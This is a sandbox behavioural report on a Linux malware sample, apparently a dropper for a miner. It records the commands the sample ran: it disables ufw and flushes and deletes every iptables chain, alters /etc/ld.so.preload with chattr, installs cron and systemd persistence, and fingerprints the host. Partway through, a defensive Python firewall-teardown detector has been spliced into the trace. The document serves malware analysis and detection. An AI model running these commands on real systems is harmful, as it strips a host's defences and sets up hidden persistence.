File opened for modification  /etc/systemd/system/pwnrige.service  Process not Found
File opened for modification  /lib/systemd/system/pwnrigl.service  Process not Found
File opened for modification  /lib/systemd/system/pwnrigl.service  tee
File opened for modification  /lib/systemd/system/pwnrigl.service  tee
File opened for modification  /etc/systemd/system/pwnrige.service  tee
File opened for modification  /etc/systemd/system/pwnrige.service  tee
File opened for modification  /lib/systemd/system/pwnrigl.service  Process not Found
File opened for modification  /lib/systemd/system/pwnrigl.service  tee
File opened for modification  /etc/systemd/system/pwnrige.service  tee
File opened for modification  /etc/systemd/system/pwnrige.service  Process not Found
File opened for modification  /lib/systemd/system/pwnrigl.service  Process not Found
File opened for modification  /etc/systemd/system/pwnrige.service  Process not Found
File opened for modification  /lib/systemd/system/pwnrigl.service  tee
File opened for modification  /lib/systemd/system/pwnrigl.service  Process not Found
File opened for modification  /lib/systemd/system/pwnrigl.service  Process not Found
File opened for modification  /etc/systemd/system/pwnrige.service  tee
File opened for modification  /lib/systemd/system/pwnrigl.service  Process not Found
File opened for modification  /etc/systemd/system/pwnrige.service  Process not Found

Reads hardware information (1 TTPs, 64 IoCs)
Accesses system information such as serial numbers and manufacturer names.
description  ioc  Process
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_version  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_asset_tag  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_version  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_asset_tag  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_uuid  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_type  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_version  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_uuid  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_version  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_version  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_version  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_serial  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_version  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_serial  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_uuid  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_asset_tag  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_version  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_type  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_serial  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_type  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_type  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_type  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/chassis_asset_tag  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/chassis_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_serial  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_uuid  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_date  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_asset_tag  Process not Found
Writes file to system bin folder 53 IoCs
Security Software Discovery 1 TTPs 26 IoCs
Adversaries may attempt to discover installed security software and its configurations.
resource  yara_rule
behavioral1/files/fstream-6.dat  upx
behavioral1/files/fstream-16.dat  upx
behavioral1/files/fstream-37.dat  upx
Checks CPU configuration 1 TTPs 64 IoCs
Reads /proc/cpuinfo, whose contents can indicate whether the system is a virtual machine.
Reads CPU attributes 1 TTPs 64 IoCs
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Process Discovery 1 TTPs 26 IoCs
Adversaries may try to discover information about running processes.
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
1592  bash
1593  bash
1596  bash
1597  bash
1400  modprobe
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory, where they run directly from RAM.
description: File opened for modification
ioc: /dev/shm/.klibsystem5
Process: 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
Writes file to tmp directory 42 IoCs
Malware often drops required files in the /tmp directory.
Processes
- /tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b (depth 1, PID 1392): /tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
  Signatures: Creates/modifies Cron job; Modifies init.d; Modifies systemd; Writes file to system bin folder; Writes file to shm directory; Writes file to tmp directory
  - /usr/bin/bash (depth 2, PID 1396): bash -c "ufw disable"
  - /usr/sbin/ufw (depth 2, PID 1396): ufw disable
    Signatures: Flushes firewall rules
    - /usr/sbin/iptables (depth 3, PID 1397): /usr/sbin/iptables -V
    - /lib/ufw/ufw-init (depth 3, PID 1398): /lib/ufw/ufw-init force-stop
      - /sbin/ip6tables (depth 4, PID 1399): ip6tables -L INPUT -n
        - /sbin/modprobe (depth 5, PID 1400): /sbin/modprobe ip6_tables
          Signatures: Loads a kernel module; Enumerates kernel/hardware configuration; System Network Configuration Discovery
      - /sbin/iptables (depth 4, PID 1402): iptables -F ufw-logging-deny
      - /sbin/iptables (depth 4, PID 1406): iptables -F ufw-logging-allow
      - /sbin/iptables (depth 4, PID 1407): iptables -F ufw-not-local
      - /sbin/iptables (depth 4, PID 1408): iptables -F ufw-user-logging-input
      - /sbin/iptables (depth 4, PID 1409): iptables -F ufw-user-limit-accept
      - /sbin/iptables (depth 4, PID 1410): iptables -F ufw-user-limit
      - /sbin/iptables (depth 4, PID 1411): iptables -F ufw-skip-to-policy-input
      - /sbin/iptables (depth 4, PID 1412): iptables -F ufw-reject-input
      - /sbin/iptables (depth 4, PID 1413): iptables -F ufw-after-logging-input
      - /sbin/iptables (depth 4, PID 1414): iptables -F ufw-after-input
      - /sbin/iptables (depth 4, PID 1415): iptables -F ufw-user-input
      - /sbin/iptables (depth 4, PID 1416): iptables -F ufw-before-input
      - /sbin/iptables (depth 4, PID 1417): iptables -F ufw-before-logging-input
      - /sbin/iptables (depth 4, PID 1418): iptables -F ufw-skip-to-policy-forward
      - /sbin/iptables (depth 4, PID 1419): iptables -F ufw-reject-forward
      - /sbin/iptables (depth 4, PID 1420): iptables -F ufw-after-logging-forward
      - /sbin/iptables (depth 4, PID 1421): iptables -F ufw-after-forward
      - /sbin/iptables (depth 4, PID 1422): iptables -F ufw-user-logging-forward
      - /sbin/iptables (depth 4, PID 1423): iptables -F ufw-user-forward
      - /sbin/iptables (depth 4, PID 1424): iptables -F ufw-before-forward
      - /sbin/iptables (depth 4, PID 1425): iptables -F ufw-before-logging-forward
      - /sbin/iptables (depth 4, PID 1426): iptables -F ufw-track-forward
      - /sbin/iptables (depth 4, PID 1427): iptables -F ufw-track-output
      - /sbin/iptables (depth 4, PID 1428): iptables -F ufw-track-input
      - /sbin/iptables (depth 4, PID 1429): iptables -F ufw-skip-to-policy-output
      - /sbin/iptables (depth 4, PID 1430): iptables -F ufw-reject-output
      - /sbin/iptables (depth 4, PID 1431): iptables -F ufw-after-logging-output
      - /sbin/iptables (depth 4, PID 1432): iptables -F ufw-after-output
      - /sbin/iptables (depth 4, PID 1433): iptables -F ufw-user-logging-output
      - /sbin/iptables (depth 4, PID 1434): iptables -F ufw-user-output
      - /sbin/iptables (depth 4, PID 1435): iptables -F ufw-before-output
      - /sbin/iptables (depth 4, PID 1436): iptables -F ufw-before-logging-output
      - /sbin/iptables (depth 4, PID 1437): iptables -Z ufw-logging-deny
      - /sbin/iptables (depth 4, PID 1438): iptables -Z ufw-logging-allow
      - /sbin/iptables (depth 4, PID 1439): iptables -Z ufw-not-local
      - /sbin/iptables (depth 4, PID 1440): iptables -Z ufw-user-logging-input
      - /sbin/iptables (depth 4, PID 1441): iptables -Z ufw-user-limit-accept
      - /sbin/iptables (depth 4, PID 1442): iptables -Z ufw-user-limit
      - /sbin/iptables (depth 4, PID 1443): iptables -Z ufw-skip-to-policy-input
      - /sbin/iptables (depth 4, PID 1444): iptables -Z ufw-reject-input
      - /sbin/iptables (depth 4, PID 1445): iptables -Z ufw-after-logging-input
      - /sbin/iptables (depth 4, PID 1446): iptables -Z ufw-after-input
      - /sbin/iptables (depth 4, PID 1447): iptables -Z ufw-user-input
      - /sbin/iptables (depth 4, PID 1448): iptables -Z ufw-before-input
      - /sbin/iptables (depth 4, PID 1449): iptables -Z ufw-before-logging-input
      - /sbin/iptables (depth 4, PID 1450): iptables -Z ufw-skip-to-policy-forward
      - /sbin/iptables (depth 4, PID 1451): iptables -Z ufw-reject-forward
      - /sbin/iptables (depth 4, PID 1452): iptables -Z ufw-after-logging-forward
      - /sbin/iptables (depth 4, PID 1453): iptables -Z ufw-after-forward
      - /sbin/iptables (depth 4, PID 1454): iptables -Z ufw-user-logging-forward
      - /sbin/iptables (depth 4, PID 1455): iptables -Z ufw-user-forward
      - /sbin/iptables (depth 4, PID 1456): iptables -Z ufw-before-forward
      - /sbin/iptables (depth 4, PID 1457): iptables -Z ufw-before-logging-forward
      - /sbin/iptables (depth 4, PID 1458): iptables -Z ufw-track-forward
      - /sbin/iptables (depth 4, PID 1459): iptables -Z ufw-track-output
      - /sbin/iptables (depth 4, PID 1460): iptables -Z ufw-track-input
      - /sbin/iptables (depth 4, PID 1461): iptables -Z ufw-skip-to-policy-output
      - /sbin/iptables (depth 4, PID 1462): iptables -Z ufw-reject-output
      - /sbin/iptables (depth 4, PID 1463): iptables -Z ufw-after-logging-output
      - /sbin/iptables (depth 4, PID 1464): iptables -Z ufw-after-output
      - /sbin/iptables (depth 4, PID 1465): iptables -Z ufw-user-logging-output
      - /sbin/iptables (depth 4, PID 1466): iptables -Z ufw-user-output
      - /sbin/iptables (depth 4, PID 1467): iptables -Z ufw-before-output
      - /sbin/iptables (depth 4, PID 1468): iptables -Z ufw-before-logging-output
      - /sbin/iptables (depth 4, PID 1469): iptables -X ufw-logging-deny
      - /sbin/iptables (depth 4, PID 1470): iptables -X ufw-logging-allow
      - /sbin/iptables (depth 4, PID 1471): iptables -X ufw-not-local
      - /sbin/iptables (depth 4, PID 1472): iptables -X ufw-user-logging-input
      - /sbin/iptables (depth 4, PID 1473): iptables -X ufw-user-logging-output
      - /sbin/iptables (depth 4, PID 1474): iptables -X ufw-user-logging-forward
      - /sbin/iptables (depth 4, PID 1475): iptables -X ufw-user-limit-accept
      - /sbin/iptables (depth 4, PID 1476): iptables -X ufw-user-limit
      - /sbin/iptables (depth 4, PID 1477): iptables -X ufw-user-input
      - /sbin/iptables (depth 4, PID 1478): iptables -X ufw-user-forward
      - /sbin/iptables (depth 4, PID 1479): iptables -X ufw-user-output
      - /sbin/iptables (depth 4, PID 1480): iptables -X ufw-skip-to-policy-input
      - /sbin/iptables (depth 4, PID 1481): iptables -X ufw-skip-to-policy-output
      - /sbin/iptables (depth 4, PID 1482): iptables -X ufw-skip-to-policy-forward
      - /sbin/iptables (depth 4, PID 1483): iptables -P INPUT ACCEPT
      - /sbin/iptables (depth 4, PID 1484): iptables -P OUTPUT ACCEPT
      - /sbin/iptables (depth 4, PID 1485): iptables -P FORWARD ACCEPT
      - /sbin/ip6tables (depth 4, PID 1486): ip6tables -F ufw6-logging-deny
      - /sbin/ip6tables (depth 4, PID 1487): ip6tables -F ufw6-logging-allow
      - /sbin/ip6tables (depth 4, PID 1488): ip6tables -F ufw6-not-local
      - /sbin/ip6tables (depth 4, PID 1489): ip6tables -F ufw6-user-logging-input
      - /sbin/ip6tables (depth 4, PID 1490): ip6tables -F ufw6-user-limit-accept
      - /sbin/ip6tables (depth 4, PID 1491): ip6tables -F ufw6-user-limit
      - /sbin/ip6tables (depth 4, PID 1492): ip6tables -F ufw6-skip-to-policy-input
      - /sbin/ip6tables (depth 4, PID 1493): ip6tables -F ufw6-reject-input
      - /sbin/ip6tables (depth 4, PID 1494): ip6tables -F ufw6-after-logging-input
      - /sbin/ip6tables (depth 4, PID 1495): ip6tables -F ufw6-after-input
      - /sbin/ip6tables (depth 4, PID 1496): ip6tables -F ufw6-user-input
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1497
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1498
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1499
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1500
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1501
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1502
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1503
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1504
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1505
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1506
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1507
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1508
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1509
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1510
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1511
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1512
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1513
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1514
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1515
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1516
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1517
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1518
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1519
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1520
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1521
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1522
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1523
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1524
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1526
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1529
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1530
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1531
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1532
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1533
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1534
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1535
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1541
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1542
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1543
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1544
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1545
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1548
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1549
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1550
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1551
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1552
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1553
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1555
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1556
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1557
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1559
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1560
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1563
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1564
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1565
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1566
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1567
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1569
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1570
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1571
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1572
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1574
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1575
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1578
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1579
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1580
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1581
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1582
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1584
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1586
-
-
-
-
  [2] /usr/bin/bash  bash -c "iptables -P INPUT ACCEPT"  PID:1592
      - System Network Configuration Discovery
  [2] /usr/sbin/iptables  iptables -P INPUT ACCEPT  PID:1592
  [2] /usr/bin/bash  bash -c "iptables -P OUTPUT ACCEPT"  PID:1593
      - System Network Configuration Discovery
  [2] /usr/sbin/iptables  iptables -P OUTPUT ACCEPT  PID:1593
  [2] /usr/bin/bash  bash -c "iptables -P FORWARD ACCEPT"  PID:1596
      - System Network Configuration Discovery
  [2] /usr/sbin/iptables  iptables -P FORWARD ACCEPT  PID:1596
  [2] /usr/bin/bash  bash -c "iptables -F"  PID:1597
      - System Network Configuration Discovery
  [2] /usr/sbin/iptables  iptables -F  PID:1597
      - Flushes firewall rules
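The tree above records a complete ufw teardown (every ufw-*/ufw6-* chain flushed with -F, zeroed with -Z and deleted with -X, then INPUT, OUTPUT and FORWARD set to ACCEPT), followed by the dropper's own `iptables -P ... ACCEPT` and `iptables -F`. The script below is an added example, not code from the sandbox report or from the sample: it parses `iptables -S` / `ip6tables -S` output, reports the end state that sequence leaves behind, and diffs the user-defined chains against a saved baseline. The two rule sets it carries are constructed, as is the baseline path mentioned in the docstring.

```python
"""Detect the firewall end state left by the ufw teardown in the trace:
every ufw-*/ufw6-* chain flushed, zeroed and deleted, and the built-in
chains set to ACCEPT.

Added example, not part of the sandbox report or the sample. Input is the
output of `iptables -S` (or `ip6tables -S`); a baseline would be captured
with something like `iptables -S > /var/lib/fw-baseline.rules` on a
known-good host (assumed path). The two rule sets below are constructed.
"""
import re

POLICY_RE = re.compile(r"^-P\s+(\S+)\s+(\S+)$")   # -P INPUT DROP
CHAIN_RE = re.compile(r"^-N\s+(\S+)$")            # -N ufw-before-input
RULE_RE = re.compile(r"^-A\s+(\S+)\s+(.*)$")      # -A INPUT -j ufw-before-input
BUILTIN = ("INPUT", "FORWARD", "OUTPUT")


def parse_rules(text):
    """Return (policies, user_chains, rules) from iptables -S output."""
    policies, chains, rules = {}, set(), []
    for raw in text.splitlines():
        line = raw.strip()
        m = POLICY_RE.match(line)
        if m:
            policies[m.group(1)] = m.group(2)
            continue
        m = CHAIN_RE.match(line)
        if m:
            chains.add(m.group(1))
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group(1), m.group(2)))
    return policies, chains, rules


def firewall_findings(text, expect_ufw=True):
    """Human-readable findings; an empty list means nothing suspicious.

    expect_ufw: the host is supposed to run ufw, so at least one ufw-*
    chain must exist; none at all means the -F/-Z/-X sequence ran (or ufw
    was never enabled on this host)."""
    policies, chains, rules = parse_rules(text)
    findings = []
    if all(policies.get(c) == "ACCEPT" for c in BUILTIN):
        findings.append("all built-in chain policies are ACCEPT")
    if not rules:
        findings.append("filter table holds no rules")
    if expect_ufw and not any(c.startswith(("ufw-", "ufw6-")) for c in chains):
        findings.append("no ufw chains exist (flushed and deleted, or ufw never enabled)")
    return findings


def missing_chains(baseline_text, current_text):
    """User-defined chains present in the baseline but gone now."""
    _, before, _ = parse_rules(baseline_text)
    _, after, _ = parse_rules(current_text)
    return sorted(before - after)


# Constructed sample: a ufw host before and after the -F/-Z/-X/-P sequence.
BASELINE = """\
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-N ufw-before-input
-N ufw-after-input
-N ufw-user-input
-A INPUT -j ufw-before-input
-A INPUT -j ufw-after-input
-A ufw-before-input -j ufw-user-input
-A ufw-user-input -p tcp -m tcp --dport 22 -j ACCEPT
"""
TORN_DOWN = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
"""

if __name__ == "__main__":
    for name, text in (("baseline", BASELINE), ("after teardown", TORN_DOWN)):
        print(name + ":", firewall_findings(text) or "clean")
    print("chains removed:", missing_chains(BASELINE, TORN_DOWN))
```

Run it against `iptables -S` and `ip6tables -S` separately, since the trace tears both down. A policy-only check is not enough on its own (a host with no ufw legitimately has ACCEPT policies), which is why the baseline diff is there: the chain names removed in the trace are exactly what `missing_chains` lists.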
  [2] /usr/bin/bash  bash -c "chattr -ia /etc/ld.so.preload"  PID:1599
  [2] /usr/bin/chattr  chattr -ia /etc/ld.so.preload  PID:1599
      - Attempts to change immutable files
  [2] /usr/bin/pgrep  pgrep -f klibsystem4  PID:1611
  [2] /usr/bin/pgrep  pgrep -f klibsystem5  PID:1612
      - Reads CPU attributes
      - Reads runtime system information
  [2] /usr/bin/chattr  chattr +ia /etc/init.d/knlib  PID:1613
      - Attempts to change immutable files
  [2] /etc/init.d/knlib  /etc/init.d/knlib start  PID:1614
      - Executes dropped EXE
    [3] /usr/bin/cp  cp -f -r -- /bin/knlib5 /bin/klibsystem5  PID:1615
    [3] /usr/bin/rm  rm -rf -- klibsystem5  PID:1617
  [2] /usr/bin/chattr  chattr +ia /etc/systemd/system/knlibe.service  PID:1618
  [2] /usr/bin/systemctl  systemctl daemon-reload  PID:1619
  [2] /usr/bin/systemctl  systemctl enable knlibe.service  PID:1652
      - Reads EFI boot settings
  [2] /usr/bin/chattr  chattr +ia /bin/knlib5  PID:1686
  [2] /usr/bin/crontab  crontab -r  PID:1687
  [2] /usr/bin/pkill  pkill -f .klibsystem5  PID:1688
      - Reads CPU attributes
      - Reads runtime system information
  [2] /usr/bin/pkill  pkill -f .klibsystem4  PID:1689
      - Reads runtime system information
  [2] /usr/bin/bash  bash -c "echo \"* * * * * /var/tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"  PID:1690
    [3] /usr/bin/crontab  crontab -  PID:1692
  [2] /usr/bin/chattr  chattr +ia /etc/cron.d/.lib-knlib4  PID:1693
  [2] /usr/bin/chattr  chattr +ia /var/spool/cron/.lib-knlib4  PID:1694
  [2] /usr/bin/chattr  chattr +ia /etc/cron.hourly/.lib-knlib4  PID:1695
  [2] /usr/bin/chattr  chattr +ia /etc/cron.daily/.lib-knlib4  PID:1696
  [2] /usr/bin/chattr  chattr +ia /etc/cron.weekly/.lib-knlib4  PID:1697
  [2] /usr/bin/chattr  chattr +ia /etc/cron.monthly/.lib-knlib4  PID:1698
  [2] /usr/bin/chattr  chattr -ia /etc/anacrontab  PID:1699
  [2] /usr/bin/chattr  chattr +ia /etc/anacrontab  PID:1700
  [2] /tmp/service-agent  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn  PID:1701
      - Executes dropped EXE
      - Checks hardware identifiers (DMI)
      - Reads hardware information
      - Checks CPU configuration
      - Reads CPU attributes
      - Enumerates kernel/hardware configuration
    [3] /bin/sh  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""  PID:1702
      [4] /usr/bin/hostname  hostname -I  PID:1705
      [4] /usr/bin/awk  awk "{print \$1}"  PID:1707
      [4] /usr/bin/awk  awk "{print \"-\"\$2}"  PID:1712
      [4] /usr/bin/head  head -n 1  PID:1711
      [4] /usr/bin/grep  grep "Port "  PID:1710
      [4] /usr/bin/cat  cat /etc/ssh/sshd_config  PID:1709
      [4] /usr/bin/whoami  whoami  PID:1713
      [4] /usr/bin/hostname  hostname  PID:1714
      [4] /usr/bin/grep  grep -c "^processor" /proc/cpuinfo  PID:1715
          - Checks CPU configuration
      [4] /usr/bin/sed  sed -e "s/\$//"  PID:1721
      [4] /usr/bin/sed  sed -e "s/^ *//"  PID:1720
      [4] /usr/bin/cut  cut -d: -f2  PID:1719
      [4] /usr/bin/grep  grep -m 1 "model name" /proc/cpuinfo  PID:1718
          - Checks CPU configuration
      [4] /usr/bin/awk  awk "{print \$1}"  PID:1724
      [4] /usr/bin/awk  awk "{print \$4}"  PID:1727
      [4] /usr/bin/awk  awk "{print \$4}"  PID:1730
